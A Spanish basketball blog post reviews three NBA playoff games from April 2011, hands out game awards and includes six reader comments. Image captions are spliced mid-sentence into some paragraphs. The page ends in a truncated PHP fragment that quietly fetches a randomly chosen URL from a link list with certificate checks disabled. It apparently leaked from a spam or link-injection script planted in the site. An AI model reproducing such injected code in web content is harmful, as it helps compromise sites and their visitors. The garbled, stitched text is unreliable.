Playoffs (19/04/2011): Sin sorpresas pero menos.

20 de April de 2011 por telekoman

Tercera jornada de los Playoffs de la NBA. Esta vez sin sorpresas, aunque no podemos decir que hayan sido victorias  Superman Howard apabuyando el juego interior de Atlantafáciles, ni mucho menos.

Orlando consiguió igualar su serie con Atlanta gracias a Howard. Horroroso Orlando desde la larga distancia. 5 triples de 23 intentos son unas cifras bastante pobres. Claro que los 7 de 20 de los Hawks tampoco es que sean para tirar cohetes. Tampoco el juego colectivo de los Magic fue nada del otro mundo. 9 asistencias y 16 pérdidas es para estar algo más que preocupados. Al final un Howard sobresaliente, sacando puntos a base de rebañar rebotes y de meter los tiros libres (esta vez sí) valió para ganar un partido a tanteo bajo, 82-88, a unos Hawks que ya consiguieron lo que querían en el partido anterior. 1 a 1 y viaje a Atlanta.

Dallas por su parte sigue teniendo partidos más plácidos de lo que se suponía a priori contra Portland. Esta vez 89-101 con Nowitzki, Stojakovic y Kidd tocando el violín. El alemán, pese a no tener un buen día en el tiro, se fué hasta los 33 puntos con una lucha muy interesante con un Aldridge que está que se sale. Pero el equipo de Portland es muy corto. Tan sólo 6 jugadores, el quinteto titular más Batum, anotaron más de 1 punto y eso siempre termina pasando factura en los finales de partido. Veremos si ahora que la serie viaja a Portland hay algo más de emoción.

El partido más ajustado se vivió en Boston, donde los Celtics sudaron sangre para ganar 93-96 a unos Knicks mermadísimos sin Billups ni Stoudemire en la segunda parte. La baja de este último por problemas de lumbago fue fundamental, pese a que Melo cuajó un partido excelso. Hizo de todo, especialmente tirar, para intentar llevar a su equipo a la victoria, pero los hados no estuvieron de parte del equipo neoyorkino. Rondo volvió por sus fueros con 30 puntos y 7 asistencias, y Pierce, Allen y Garnett acompañaron más que convenientemente. Fue este último el protagonista del final del partido con un ganchito que dejaba a su equipo 1 por encima a falta de 11 Melo tirando forzado ante la defensa de Piercesegundos  y una gran defensa con robo incorporado en la última jugada de los Knicks. Esta claro que los Celtics son un hueso duro de roer y si encima dejas que se te escapen vivos… La serie se desplaza a New York con un 2-0 que podría ser sin ningún problema un 0-2.

PREMIOS

MVP: Si el argumento para el MVP de la temporada era quién es más insustituible para su equipo Howard debería ganar enteros con actuaciones como la de ayer. Qué sería de los Magic ahora mismo de no ser por sus 33 puntos y 19 rebotes de anoche,  con 2 robos y un tapón de regalo. Ni siquiera con el agujero que crea dentro sus compañeros son capaces de aprovecharlo fuera. Eso sí, tener a Jason Collins delante ayuda bastante.

La sorpresa: Los viejos roqueros nunca mueren y ayer Stojakovic la lió parda ante los sólidos sistemas defensivos de McMillan durante la segunda parte. 21 puntos con un 5-10 en triples y 5 rebotes. Casi como en la época dorada del “guateque” en los Sacramento Kings.

La decepción: Contemplar un superclase como Brandon Roy arrastrarse en una eliminatoria de playoffs es toda una patada en el hígado para este deporte. Ójala pudieramos decir que es cuestión de tiempo que pueda volver a ser el que era.

El mayor esfuerzo en vano: No creemos que el fichaje de Carmelo Anthony estuviera pensado para malvivir solo después de que se lesione todo el mundo. El otro día Billups, anoche Stoudemire. A este paso va a tener que jugar Spike Lee. El crack neoyorkino peleó a brazo partido contra su destino y por poco logra doblegarle. 42 puntos, 17 rebotes, 6 asistencias y dos tapones. A los Celtics aún les dura el susto en el cuerpo.

Y UNA DE REGALO

Lamar Odom ha sido nombrado Mejor 6º hombre de la temporada con una distancia bastante grande sobre el segundo en discordia, Jason Terry.

Comenta

6 comentarios a esta entrada

  1. Toni dice:
    #1

    Todo lo malos que fueron los primeros cuartos del Knicks-Celtics lo tuvo de emocionante el 4º. Melo hizo un partido increible, metiendolas de todos los colores y hasta involucrando a jugadores como Toney Douglas (que estaba en la luna), shawne williams o Jared Jeffries, que para mi hizo un partidazo en los dos lados de la cancha.

      Citar

  2. Hynreck dice:
    #2

    Que pena me da ver malviviendo a Marvin Williams en Atlanta, cuando se le eligió era una apuesta a largo plazo puesto que era el jugador con mayor potencial de aquel draft, pero cada vez su aportación es menor.
    Lo de Rudy tambien es preocupante, necesita un cambio de aires como el comer.

      Citar

  3. ralage dice:
    #3

    La verdad empieza a ser preocupante los de estos Celtics, no puede ser que los Knicks, te cojan 20 rebotes ofensivos, aunque viendo cosas como el último minuto de Garnett, uno siempre les va a dar un voto de confianza.
    Mención especial a Melo y algunas canastas q clavó como el triple en la cara de Pierce o la canasta contra tabla

      Citar

  4. Antoine Doinel dice:
    #4

    Estaba repasando las estadísticas del BOS-NYK y me estaba quedando sorprendido: un 47% de tiros de BOS frente un 35% de NYK, 21 asistencias de Celtics frente a 14, parejos en pérdidas y robos… Y me preguntaba, ¿dónde está la diferencia para que fuera un partido tan igualado?

    Respuesta: Rebotes ofensivos. NYK capturó 20, entre ellos Anthony 5. Sorprendente, cuanto menos, más si tenemos en cuenta la ausencia de Stoudamire. Si Boston no cierra la zona lo va a pasar mal quizás no contra Miami, pero seguro que contra Chicago si pasa, con Boozer husmeando. Yo, como seguidor Celtic, me estoy empezando a preocupar por el poco rendimiento del banquillo, Glen Davis 4 puntos y Jeff Green 6 puntos y 5 PF en 12 minutitos.

    Muy meritorio lo de los Knicks pese a las bajas. Y lo de Carmelo, mal primer partido, se conciencia y se casca semejante partidazo 25 años después del de Jordan en el Garden.

      Citar

  5. Vader dice:
    #5

    Lastima de la última jugada de ataque de NY. Si los Knicks se llegan a poner 1-1 y en los proximos partidos estuviera Stat a pleno rendimiento quien sabe lo que podria pasar viendo los problemas en el rebote de Celtics. Ahora con 2-0 la cosa esta muy cuesta arriba pero si vuelve Stat y Billups espero que aún les demos algún susto a los verdes y como mínimo caigamos con la cabeza alta.

    Que partidazo de Melo, las metia de todos los colores. Para mi ofensivamente él y Kevin Durant me parecen los mejores aleros de la liga.

    Saludos

      Citar

  6. Jose Luis dice:
    #6

    Ayer pude ver el Knicks @ Celtics, bastante entretenido.

    Las bajas en el puesto de base mermaron mucho la defensa. Increíble los 14 puntos de Rondo, le sacó la primera falta a Douglas, y en las siguientes 4 penetraciones Douglas se apartó dejando las bandejas libres para no cometer falta, hasta que la hizo y salió Carter a defender. Los knicks parecían desesperados cuando se vieron 10 abajo, pero Carmelo salió al rescate y sumó varios puntos para igualar el partido. Sacó dos jugadas de tres puntos cuando quedó emparejado con hombres más grandes y la ventaja quedó en +2 para Boston. El banquillo de Boston pésimo, sin anotar en el primer cuarto, y sin compenetración alguna. Mal Krstic, Green, West, hasta Glen Davis, que es “de la casa”.

    Un partido rarísimo, Knicks ganan el rebote por 11 y Celtics los puntos de contraataque por 14 al descanso. La defensa de Knicks, mejor que la de Celtics, y a pesar de la baja de Stoudemire, los Knicks se van arriba debido a su superioridad en la zona y el gran partido de Anthony, que en el 3er cuarto se ve demasiado solo en ataque, sin Billups ni Stoudemire, con un Turiaf inactivo ofensivamente, Douglas que no es nada del otro mundo, Fields no es un anotador nato y el resto son Shawne Williams, Jared Jeffries, Bill Walter, jugadores válidos de banquillo pero no con responsabilidad de tirar tiros importantes constantemente. Al final Jeffries y Douglas hicieron un buen partido dado su nivel y lo que se espera de ellos.

    Los Celtics con bastante suerte o como queráis llamarlo, pero si esto fuera 0-2 no sería nada extraño. A ver las bajas si vuelven pronto y los Knicks sacan los dos en su cancha, que es probable diría yo, si se mantienen defendiendo así.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>